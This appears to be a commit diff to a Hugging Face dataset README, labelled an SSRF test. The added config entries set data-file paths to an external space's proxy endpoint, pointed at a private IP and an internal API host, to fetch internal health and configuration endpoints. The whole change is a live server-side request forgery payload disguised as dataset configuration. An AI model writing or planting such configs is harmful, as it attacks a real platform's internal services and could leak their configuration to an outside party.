internal api ssrf test
Browse files
README.md
CHANGED
|
@@ -1,8 +1,11 @@
|
|
| 1 |
---
|
| 2 |
configs:
|
| 3 |
-
- config_name:
|
| 4 |
data_files:
|
| 5 |
- split: train
|
| 6 |
-
path: "https://xitro-env-probe.hf.space/
|
|
|
|
|
|
|
|
|
|
|
|
|
| 7 |
---
|
| 8 |
-
# SSRF Test
|
|
|
|
| 1 |
---
|
| 2 |
configs:
|
| 3 |
+
- config_name: "internal_health"
|
| 4 |
data_files:
|
| 5 |
- split: train
|
| 6 |
+
path: "https://xitro-env-probe.hf.space/internproxy?target=10.0.249.215:80&path=/_internal/health&host=api-internal.huggingface.co"
|
| 7 |
+
- config_name: "internal_config"
|
| 8 |
+
data_files:
|
| 9 |
+
- split: train
|
| 10 |
+
path: "https://xitro-env-probe.hf.space/internproxy?target=10.0.249.215:80&path=/api/config&host=api-internal.huggingface.co"
|
| 11 |
---
|
|
|